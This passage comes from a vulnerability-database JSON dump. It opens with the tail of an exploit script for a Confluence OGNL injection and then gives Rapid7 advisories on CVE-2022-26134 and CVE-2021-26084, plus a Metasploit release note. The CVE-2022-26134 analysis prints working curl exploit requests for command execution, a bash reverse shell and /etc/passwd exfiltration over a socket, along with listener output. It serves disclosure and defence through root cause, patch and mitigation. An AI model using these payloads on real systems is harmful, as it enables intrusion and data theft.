java.lang.ProcessBuilder(); if(isWin){p.command(\\\\u0022cmd.exe\\\\u0022, \\\\u0022/c\\\\u0022, cmd); } else{p.command(\\\\u0022bash\\\\u0022, \\\\u0022-c\\\\u0022, cmd); }p.redirectErrorStream(true); var process= p.start(); var inputStreamReader = new java.io.InputStreamReader(process.getInputStream()); var bufferedReader = new java.io.BufferedReader(inputStreamReader); var line = \\\\u0022\\\\u0022; var output = \\\\u0022\\\\u0022; while((line = bufferedReader.readLine()) != null){output = output + line + java.lang.Character.toString(10); }\\\\u0027)}+\\\\u0027\"}\n rawHTML = session.post(xpl_url, headers=xpl_headers, data=xpl_data)\n\n soup = BeautifulSoup(rawHTML.text, 'html.parser')\n queryStringValue = soup.find('input',attrs = {'name':'queryString', 'type':'hidden'})['value']\n print(queryStringValue)\n\n\nbanner()\ncmdExec()\n", "sourceHref": "https://0day.today/exploit/36694", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "rapid7blog": [{"lastseen": "2022-06-07T01:56:25", "description": "\n\nOn June 2, 2022, Atlassian published a [security advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) for CVE-2022-26134, a critical unauthenticated remote code execution vulnerability in Confluence Server and Confluence Data Center. The vulnerability was unpatched when it was published on June 2. As of June 3, both patches and a temporary workaround are available.\n\nCVE-2022-26134 is being actively and widely [exploited in the wild](<https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/>). Rapid7's Managed Detection and Response (MDR) team has observed an uptick of likely exploitation of CVE-2022-26134 in customer environments as of June 3.\n\nAll supported versions of Confluence Server and Data Center are affected. \nAtlassian updated their advisory on June 3 to reflect that it's likely that **all versions** (whether supported or not) of Confluence Server and Data Center are affected, but they have yet to confirm the earliest affected version. Organizations should install patches OR apply the workaround on an **emergency basis**. If you are unable to mitigate the vulnerability for any version of Confluence, you should restrict or disable Confluence Server and Confluence Data Center instances immediately.\n\n## Technical analysis\n\nCVE-2022-26314 is an unauthenticated and remote OGNL injection vulnerability resulting in code execution in the context of the Confluence server (typically the `confluence` user on Linux installations). Given the nature of the vulnerability, [internet-facing](<https://www.shodan.io/search?query=X-Confluence-Request-Time>) Confluence servers are at very high risk.\n\nLast year, Atlassian Confluence suffered from a different unauthenticated and remote OGNL injection, [CVE-2021-26084](<https://www.rapid7.com/blog/post/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/>). Organizations maintaining an internet-facing Confluence or Data Server may want to consider permanently moving access behind a VPN.\n\n### The vulnerability\n\nAs stated, the vulnerability is an OGNL injection vulnerability affecting the HTTP server. The OGNL payload is placed in the URI of an HTTP request. Any type of HTTP method appears to work, whether valid (GET, POST, PUT, etc) or invalid (e.g. \u201cBALH\u201d). In its simplest form, an exploit abusing the vulnerability looks like this:\n \n \n curl -v http://10.0.0.28:8090/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch%20/tmp/r7%22%29%7D/\n \n\nAbove, the exploit is URL-encoded. The exploit encompasses everything from the start of the content location to the last instance of `/`. Decoded it looks like this:\n \n \n ${@java.lang.Runtime@getRuntime().exec(\"touch /tmp/r7\")}\n \n\nEvidence of exploitation can typically be found in access logs because the exploit is stored in the HTTP request field. For example, on our test Confluence (version 7.13.6 LTS), the log file `/opt/atlassian/confluence/logs/conf_access_log.<yyyy-mm-dd>.log` contains the following entry after exploitation:\n \n \n [02/Jun/2022:16:02:13 -0700] - http-nio-8090-exec-10 10.0.0.28 GET /%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch%20/tmp/r7%22%29%7D/ HTTP/1.1 302 20ms - - curl/7.68.0\n \n\nScanning for vulnerable servers is easy because exploitation allows attackers to force the server to send command output in the HTTP response. For example, the following request will return the response of `whoami` in the attacker-created `X-Cmd-Response` HTTP field (credit to Rapid7\u2019s Brandon Turner for the exploit below). Note the `X-Cmd-Response: confluence` line in the HTTP response:\n \n \n curl -v http://10.0.0.28:8090/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/\n * Trying 10.0.0.28:8090...\n * TCP_NODELAY set\n * Connected to 10.0.0.28 (10.0.0.28) port 8090 (#0)\n > GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1\n > Host: 10.0.0.28:8090\n > User-Agent: curl/7.68.0\n > Accept: */*\n > \n * Mark bundle as not supporting multiuse\n < HTTP/1.1 302 \n < Cache-Control: no-store\n < Expires: Thu, 01 Jan 1970 00:00:00 GMT\n < X-Confluence-Request-Time: 1654212503090\n < Set-Cookie: JSESSIONID=34154443DC363351DD0FE3D1EC3BEE01; Path=/; HttpOnly\n < X-XSS-Protection: 1; mode=block\n < X-Content-Type-Options: nosniff\n < X-Frame-Options: SAMEORIGIN\n < Content-Security-Policy: frame-ancestors 'self'\n < X-Cmd-Response: confluence \n < Location: /login.action?os_destination=%2F%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D%2Findex.action&permissionViolation=true\n < Content-Type: text/html;charset=UTF-8\n < Content-Length: 0\n < Date: Thu, 02 Jun 2022 23:28:23 GMT\n < \n * Connection #0 to host 10.0.0.28 left intact\n \n\nDecoding the exploit in the `curl` request shows how this is achieved. The exploit saves the output of the `exec` call and uses `setHeader` to include the result in the server\u2019s response to the attacker.\n \n \n ${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(\"whoami\").getInputStream(),\"utf-8\")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader(\"X-Cmd-Response\",#a))}\n \n\n### Root cause\n\nOur investigation led to the following partial call stack. The call stack demonstrates the OGNL injection starting from `HttpServlet.service` to `OgnlValueStack.findValue` and beyond.\n \n \n at ognl.SimpleNode.evaluateGetValueBody(SimpleNode.java:171)\n at ognl.SimpleNode.getValue(SimpleNode.java:193)\n at ognl.Ognl.getValue(Ognl.java:333)\n at ognl.Ognl.getValue(Ognl.java:310)A\n at com.opensymphony.xwork.util.OgnlValueStack.findValue(OgnlValueStack.java:141)\n at com.opensymphony.xwork.util.TextParseUtil.translateVariables(TextParseUtil.java:39)\n at com.opensymphony.xwork.ActionChainResult.execute(ActionChainResult.java:95)\n at com.opensymphony.xwork.DefaultActionInvocation.executeResult(DefaultActionInvocation.java:263)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:187)\n at com.atlassian.confluence.xwork.FlashScopeInterceptor.intercept(FlashScopeInterceptor.java:21)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.confluence.core.actions.LastModifiedInterceptor.intercept(LastModifiedInterceptor.java:27)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.confluence.core.ConfluenceAutowireInterceptor.intercept(ConfluenceAutowireInterceptor.java:44)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.xwork.interceptors.TransactionalInvocation.invokeAndHandleExceptions(TransactionalInvocation.java:61)\n at com.atlassian.xwork.interceptors.TransactionalInvocation.invokeInTransaction(TransactionalInvocation.java:51)\n at com.atlassian.xwork.interceptors.XWorkTransactionInterceptor.intercept(XWorkTransactionInterceptor.java:50)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.confluence.xwork.SetupIncompleteInterceptor.intercept(SetupIncompleteInterceptor.java:61)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.confluence.security.interceptors.SecurityHeadersInterceptor.intercept(SecurityHeadersInterceptor.java:26)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.opensymphony.xwork.DefaultActionProxy.execute(DefaultActionProxy.java:115)\n at com.atlassian.confluence.servlet.ConfluenceServletDispatcher.serviceAction(ConfluenceServletDispatcher.java:56)\n at com.opensymphony.webwork.dispatcher.ServletDispatcher.service(ServletDispatcher.java:199)\n at javax.servlet.http.HttpServlet.service(HttpServlet.java:764)\n \n\n`OgnlValueStack` [findValue(str)](<https://struts.apache.org/maven/struts2-core/apidocs/com/opensymphony/xwork2/ognl/OgnlValueStack.html#findValue-java.lang.String->) is important as it is the starting point for the OGNL expression to be evaluated. As we can see in the call stack above, `TextParseUtil.class` invokes `OgnlValueStack.findValue` when this vulnerability is exploited.\n \n \n public class TextParseUtil {\n public static String translateVariables(String expression, OgnlValueStack stack) {\n StringBuilder sb = new StringBuilder();\n Pattern p = Pattern.compile(\"\\\\$\\\\{([^}]*)\\\\}\");\n Matcher m = p.matcher(expression);\n int previous = 0;\n while (m.find()) {\n String str1, g = m.group(1);\n int start = m.start();\n try {\n Object o = stack.findValue(g);\n str1 = (o == null) ? \"\" : o.toString();\n } catch (Exception ignored) {\n str1 = \"\";\n } \n sb.append(expression.substring(previous, start)).append(str1);\n previous = m.end();\n } \n if (previous < expression.length())\n sb.append(expression.substring(previous)); \n return sb.toString();\n }\n }\n \n\n`ActionChainResult.class` calls `TextParseUtil.translateVariables` using `this.namespace` as the provided expression:\n \n \n public void execute(ActionInvocation invocation) throws Exception {\n if (this.namespace == null)\n this.namespace = invocation.getProxy().getNamespace(); \n OgnlValueStack stack = ActionContext.getContext().getValueStack();\n String finalNamespace = TextParseUtil.translateVariables(this.namespace, stack);\n String finalActionName = TextParseUtil.translateVariables(this.actionName, stack);\n \n\nWhere `namespace` is created from the request URI string in `com.opensymphony.webwork.dispatcher.ServletDispatcher.getNamespaceFromServletPath`:\n \n \n public static String getNamespaceFromServletPath(String servletPath) {\n servletPath = servletPath.substring(0, servletPath.lastIndexOf(\"/\"));\n return servletPath;\n }\n \n\nThe result is that the attacker-provided URI will be translated into a namespace, which will then find its way down to OGNL expression evaluation. At a high level, this is very similar to [CVE-2018-11776](<https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/struts2_namespace_ognl.rb>), the Apache Struts2 namespace OGNL injection vulnerability. Just a reminder that there is nothing new in this world.\n\n### The patch\n\nOn June 3, 2022, Atlassian directed customers to replace `xwork-1.0.3.6.jar` with a newly released `xwork-1.0.3-atlassian-10.jar`. The xwork jars contain the `ActionChainResult.class` and `TextParseUtil.class` we identified as the path to OGNL expression evaluation.\n\nThe patch makes a number of small changes to fix this issue. For one, `namespace` is no longer passed down to `TextParseUtil.translateVariables` from `ActionChainResult.execute`:\n\n**Before:**\n \n \n public void execute(ActionInvocation invocation) throws Exception {\n if (this.namespace == null)\n this.namespace = invocation.getProxy().getNamespace(); \n OgnlValueStack stack = ActionContext.getContext().getValueStack();\n String finalNamespace = TextParseUtil.translateVariables(this.namespace, stack);\n String finalActionName = TextParseUtil.translateVariables(this.actionName, stack);\n \n\n**After:**\n \n \n public void execute(ActionInvocation invocation) throws Exception {\n if (this.namespace == null)\n this.namespace = invocation.getProxy().getNamespace(); \n String finalNamespace = this.namespace;\n String finalActionName = this.actionName;\n \n\nAtlassian also added `SafeExpressionUtil.class` to the `xworks` jar. `SafeExpressionUtil.class` provides filtering of unsafe expressions and has been inserted into `OgnlValueStack.class` in order to examine expressions when `findValue` is invoked. For example:\n \n \n public Object findValue(String expr) {\n try {\n if (expr == null)\n return null; \n if (!this.safeExpressionUtil.isSafeExpression(expr))\n return null; \n if (this.overrides != null && this.overrides.containsKey(expr))\n \n\n### Payloads\n\nThe OGNL injection primitive gives attackers many options. Volexity\u2019s excellent **[Zero-Day Exploitation of Atlassian Confluence](<https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/>)** discusses JSP webshells being dropped to disk. However, Confluence Server should typically execute as `confluence` and not `root`. The `confluence` user is fairly restricted and unable to introduce web shells (to our knowledge).\n\nJava does otherwise provide a wide variety of features that aid in achieving and maintaining execution (both with and without touching disk). It\u2019s impossible to demonstrate all here, but a reverse shell routed through Java\u2019s [Nashorn](<https://docs.oracle.com/javase/10/nashorn/introduction.htm#JSNUG136>) engine is, perhaps, an interesting place for others to explore.\n \n \n curl -v http://10.0.0.28:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/10.0.0.28/1270%200%3E%261%27%29.start%28%29%22%29%7D/\n \n\nDecoded, the exploit looks like the following:\n \n \n ${new javax.script.ScriptEngineManager().getEngineByName(\"nashorn\").eval(\"new java.lang.ProcessBuilder().command('bash','-c','bash -i >& /dev/tcp/10.0.0.28/1270 0>&1').start()\")}\n \n\nAnd results in a reverse shell:\n \n \n albinolobster@ubuntu:~$ nc -lvnp 1270\n Listening on 0.0.0.0 1270\n Connection received on 10.0.0.28 37148\n bash: cannot set terminal process group (34470): Inappropriate ioctl for device\n bash: no job control in this shell\n bash: /root/.bashrc: Permission denied\n confluence@ubuntu:/opt/atlassian/confluence/bin$ id\n id\n uid=1001(confluence) gid=1002(confluence) groups=1002(confluence)\n confluence@ubuntu:/opt/atlassian/confluence/bin$\n \n\nOf course, shelling out can be highly risky for attackers if the victim is running some type of threat detection software. Executing in memory only is least likely to get an attacker caught. As an example, we put together a simple exploit that will read `/etc/passwd` and exfiltrate it to the attacker without shelling out.\n \n \n curl -v http://10.0.0.28:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22var%20data%20%3D%20new%20java.lang.String%28java.nio.file.Files.readAllBytes%28java.nio.file.Paths.get%28%27/etc/passwd%27%29%29%29%3Bvar%20sock%20%3D%20new%20java.net.Socket%28%2710.0.0.28%27%2C%201270%29%3B%20var%20output%20%3D%20new%20java.io.BufferedWriter%28new%20java.io.OutputStreamWriter%28sock.getOutputStream%28%29%29%29%3B%20output.write%28data%29%3B%20output.flush%28%29%3B%20sock.close%28%29%3B%22%29%7D/\n \n\nWhen decoded, the reader can see that we again have relied on the Nashorn scripting engine.\n \n \n ${new javax.script.ScriptEngineManager().getEngineByName(\"nashorn\").eval(\"var data = new java.lang.String(java.nio.file.Files.readAllBytes(java.nio.file.Paths.get('/etc/passwd')));var sock = new java.net.Socket('10.0.0.28', 1270); var output = new java.io.BufferedWriter(new java.io.OutputStreamWriter(sock.getOutputStream())); output.write(data); output.flush(); sock.close();\")}\n \n\nAgain, the attacker is listening for the exfiltration which looks, as you\u2019d expect, like `/etc/passd`:\n \n \n albinolobster@ubuntu:~$ nc -lvnp 1270\n Listening on 0.0.0.0 1270\n Connection received on 10.0.0.28 37162\n root:x:0:0:root:/root:/bin/bash\n daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n bin:x:2:2:bin:/bin:/usr/sbin/nologin\n sys:x:3:3:sys:/dev:/usr/sbin/nologin\n sync:x:4:65534:sync:/bin:/bin/sync\n games:x:5:60:games:/usr/games:/usr/sbin/nologin\n man:x:6:12:man:/var/cache/man:/usr/sbin/nologin\n lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\n mail:x:8:8:mail:/var/mail:/usr/sbin/nologin\n \u2026 truncated \u2026\n \n\nFinally, note that the exploit could be entirely URI-encoded as well. Writing any type of detection logic that relies on **just** the ASCII form will be quickly bypassed.\n\n## Mitigation guidance\n\nAtlassian released patches for CVE-2022-26134 on June 3, 2022. A full list of fixed versions is available in the [advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>). A temporary workaround for CVE-2022-26134 is also available\u2014note that the workaround must be manually applied. Detailed instructions are [available in Atlassian's advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) for applying the workaround to Confluence Server and Data Center 7.15.0-7.18.0 and 7.0.0-7.14.2.\n\nOrganizations should install patches OR apply the workaround on an **emergency basis**. If you are unable to mitigate the vulnerability for any version of Confluence, you should restrict or disable Confluence Server and Confluence Data Center instances immediately. We recommend that all organizations consider implementing IP address safelisting rules to restrict access to Confluence.\n\nIf you are unable to apply safelist IP rules to your Confluence server, consider adding WAF protection. Based on the details published so far, we recommend adding Java deserialization rules that defend against RCE injection vulnerabilities, such as CVE-2021-26084. For example, see the `JavaDeserializationRCE_BODY`, `JavaDeserializationRCE_URI`, `JavaDeserializationRCE_QUERYSTRING`, and `JavaDeserializationRCE_HEADER` rules described [here](<https://docs.aws.amazon.com/waf/latest/developerguide/aws-managed-rule-groups-baseline.html#aws-managed-rule-groups-baseline-known-bad-inputs>).\n\n## Rapid7 customers\n\n**InsightVM and Nexpose:** Customers can assess their exposure to CVE-2022-26134 with two unauthenticated vulnerability checks as of June 3, 2022:\n\n * A remote check (atlassian-confluence-cve-2022-26134-remote) available in the 3:30 PM EDT content-only release on June 3\n * A remote _version_ check (atlassian-confluence-cve-2022-26134) available in the 9 PM EDT content-only release on June 3\n\n**InsightIDR:** Customers should look for alerts generated by InsightIDR's built-in detection rules from systems monitored by the Insight Agent. Alerts generated by the following rules may be indicative of related malicious activity:\n\n * Confluence Java App Launching Processes\n\nThe Rapid7 MDR (Managed Detection &amp; Response) SOC is monitoring for this activity and will escalate confirmed malicious activity to managed customers immediately.\n\n**tCell:** Customers leveraging the Java App Server Agent can protect themselves from exploitation by using the OS Commands block capability. For customers leveraging a Web Server Agent, we recommend creating a block rule for any url path starting with `${` or `%24%7B`.\n\n## Updates\n\n**June 3, 2022 11:20 AM EDT:** This blog has been updated to reflect that all supported versions of Confluence Server and Confluence Data Center are affected, and it's likely that **all versions** (including LTS and unsupported) are affected, but Atlassian has not yet determined the earliest vulnerable version.\n\n**June 3, 2022 11:45 AM EDT:** Atlassian has released a temporary workaround for CVE-2022-26134. The workaround must be manually applied. Detailed instructions are [available in Atlassian's advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) for applying the workaround to Confluence Server and Data Center 7.15.0-7.18.0 and 7.0.0-7.14.2.\n\n**June 3, 2022 1:15 PM EDT:** Atlassian has released patches for CVE-2022-26134. A full list of fixed versions is [available in their advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>). Rapid7 recommends applying patches OR the temporary workaround (manual) on an **emergency basis.**\n\n**June 3, 2022 3:15 PM EDT:** A full technical analysis of CVE-2022-26134 has been added to this blog to aid security practitioners in understanding and prioritizing this vulnerability. A vulnerability check for InsightVM and Nexpose customers is in active development with a release targeted for this afternoon.\n\n**June 3, 2022 3:30 PM EDT:** InsightVM and Nexpose customers can assess their exposure to CVE-2022-26134 with a remote vulnerability check in today's (June 3, 2022) content release.\n\n**June 6, 2022 10 AM EDT:** A second content release went out the evening of Friday, June 3 containing a remote version check for CVE-2022-26134. This means InsightVM and Nexpose customers are able to assess their exposure to CVE-2022-26134 with two unauthenticated vulnerability checks.\n\nAttacker activity targeting on-premise instances of Confluence Server and Confluence Data Center has continued to increase. Organizations that have not yet applied the patch or the workaround should **assume compromise** and activate incident response protocols in addition to remediating CVE-2022-26134 on an emergency basis.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-02T23:27:15", "type": "rapid7blog", "title": "Active Exploitation of Confluence CVE-2022-26134", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776", "CVE-2021-26084", "CVE-2022-26134", "CVE-2022-26314"], "modified": "2022-06-02T23:27:15", "id": "RAPID7BLOG:396ACAA896DDC62391C1F6CBEDA04085", "href": "https://blog.rapid7.com/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-07T15:01:26", "description": "\n\n_This attack is ongoing. See the `Updates` section at the end of this post for new information as it comes to light._\n\nOn August 25, 2021, Atlassian [published details](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) on [CVE-2021-26084](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084/rapid7-analysis?referrer=blog>), a critical remote code execution vulnerability in Confluence Server and Confluence Data Center. The vulnerability arises from an OGNL injection flaw and allows unauthenticated attackers to execute arbitrary code on Confluence Server or Data Center instances. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.\n\nProof-of-concept exploit code has been publicly available since August 31, 2021, and both Rapid7 and community researchers have observed active exploitation as of September 2. **Organizations that have not patched this Confluence Server and Confluence Data Center vulnerability should do so on an emergency basis.**\n\nFor a complete list of fixed versions, see [Atlassian\u2019s advisory here](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>).\n\nFor full vulnerability analysis, including triggers and check information, see [Rapid7\u2019s analysis in AttackerKB](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084/rapid7-analysis?referrer=blog>).\n\n## Rapid7 customers\n\nRapid7's Managed Detection and Response (MDR) team has observed active exploitation against vulnerable Confluence targets. InsightIDR customers should ensure that the Insight Agent is installed on all Confluence servers to maximize post-compromise detection visibility.\n\nInsightVM and Nexpose customers can assess their exposure to [CVE-2021-26084](<https://www.rapid7.com/db/vulnerabilities/atlassian-confluence-cve-2021-26084/>) with remote vulnerability checks as of the August 26, 2021 content release.\n\n## Updates\n\n**September 2, 2021:** \nThe Rapid7 Threat Detection &amp; Response team added or updated the following detections to InsightIDR to help you identify successful exploitation of this vulnerability:\n\n * **Suspicious Process - Curl Downloading Shell Script** detects when the Curl utility is being used to download a shell script. The Curl utility is often used by malicious actors to download additional payloads on compromised Linux systems.\n * **Suspicious Process - Confluence Java App Launching Processes** identifies processes being launched by the Atlassian Confluence server app. Malicious actors have been observed exploiting CVE-2021-26084, a vulnerability for Confluence disclosed in August 2021 which can allow execution of arbitrary processes.\n * **Suspicious Process - Common Compromised Linux Webserver Commands** identifies commands that Rapid7 has observed being run on compromised Linux webservers.\n\n**September 3, 2021:** \nAttacks are continuing to increase, therefore Rapid7 has updated the patching priority to &quot;patch on an emergency basis.&quot;\n\nThe US Cyber Command has tweeted guidance asking for organizations to [&quot;patch immediately&quot;](<https://twitter.com/CNMF_CyberAlert/status/1433787671785185283>) as &quot;this cannot wait until after the weekend.&quot;\n\nCISA has also released a [ransomware awareness guide](<https://us-cert.cisa.gov/ncas/alerts/aa21-243a>) for holidays and weekends.\n\nCurrent attacks have been focused on deploying coin miners, but the pivot to deploying ransomware may not take long.\n\n**September 7, 2021:** \nAtlassian has updated their [advisory on CVE-2021-26084](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) to note that the vulnerability is exploitable by unauthenticated attackers _regardless of configuration._ Widespread exploitation is ongoing.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {}, "published": "2021-09-02T15:44:36", "type": "rapid7blog", "title": "Active Exploitation of Confluence Server & Confluence Data Center: CVE-2021-26084", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-02T15:44:36", "id": "RAPID7BLOG:A94573CD34833AE3602C45D8FAA89AD4", "href": "https://blog.rapid7.com/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-22T15:05:39", "description": "## We just couldn't contain ourselves!\n\n\n\nThis week we've got two Kubernetes modules coming at you from [adfoster-r7](<https://github.com/adfoster-r7>) and [smcintyre-r7](<https://github.com/smcintyre-r7>). First up is an enum module `auxiliary/cloud/kubernetes/enum_kubernetes` that'll extract a variety of information including the namespaces, pods, secrets, service token information, and the Kubernetes environment version! Next is an authenticated code execution module `exploit/multi/kubernetes/exec` (which shipped with a new websocket implementation, too, by the way) that will spin up a new pod with a Meterpreter payload for you provided you have the Kubernetes JWT token and access to the Kubernetes REST API. These modules can even be run through a compromised container that may be running on the Kubernetes cluster.\n\n## Atlassian Confluence WebWork OGNL Injection gets Windows support\n\nYou might remember [Confluence Server CVE-2021-26084](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis?referrer=blog>) making an appearance in a wrap-up last month, and it's back! Rapid7\u2019s own [wvu-r7](<https://github.com/wvu-r7>) has updated his Confluence Server exploit to support Windows targets.\n\n## New module content (2)\n\n * [Kubernetes Enumeration](<https://github.com/rapid7/metasploit-framework/pull/15786>) by Spencer McIntyre and Alan Foster - This adds a module for enumerating Kubernetes environments. It can be run via an established session within a Kubernetes environment or with an authentication token and target information. It will extract a variety of information including the namespaces, pods, secrets and version.\n * [Kubernetes authenticated code execution](<https://github.com/rapid7/metasploit-framework/pull/15733>) by Spencer McIntyre and Alan Foster - Adds a new `exploit/multi/kubernetes/exec` module. It can be run via an established session within a Kubernetes environment or with an authentication token and target information. The module creates a new pod which will execute a Meterpreter payload to open a new session, as well as mounting the host's file system when possible.\n\n## Enhancements and features\n\n * [#15732](<https://github.com/rapid7/metasploit-framework/pull/15732>) from [dwelch-r7](<https://github.com/dwelch-r7>) \\- Adds terminal size synchronisation for fully interactive shells against Linux environments with `shell -it`. This functionality is behind a feature flag and can be enabled with `features set fully_interactive_shells true`.\n * [#15769](<https://github.com/rapid7/metasploit-framework/pull/15769>) from [wvu-r7](<https://github.com/wvu-r7>) \\- Added Windows support to the Atlassian Confluence CVE-2021-26084 exploit.\n * [#15773](<https://github.com/rapid7/metasploit-framework/pull/15773>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Adds a collection of useful commands for configuring a local or remote Kubernetes environment to aid with testing and exploring Metasploit's Kubernetes modules and pivoting capabilities. The resource files include deploying two vulnerable applications, and populating secrets which can be extracted and stored as loot, as well as utility commands for creating admin and service account tokens.\n\n## Bugs fixed\n\n * [#15760](<https://github.com/rapid7/metasploit-framework/pull/15760>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Fixes an issue when attempting to store JSON loot, where the extension was always being set to `bin` instead of `json`.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.1.10...6.1.11](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-10-13T09%3A47%3A12-05%3A00..2021-10-21T11%3A22%3A54-04%3A00%22>)\n * [Full diff 6.1.10...6.1.11](<https://github.com/rapid7/metasploit-framework/compare/6.1.10...6.1.11>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2021-10-22T14:25:55", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-22T14:25:55", "id": "RAPID7BLOG:755102CA788DC2D430C6890A3E9B1040", "href": "https://blog.rapid7.com/2021/10/22/metasploit-wrap-up-135/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-14T17:04:53", "description": "## A Confluence of High-Profile Modules\n\n\n\nThis 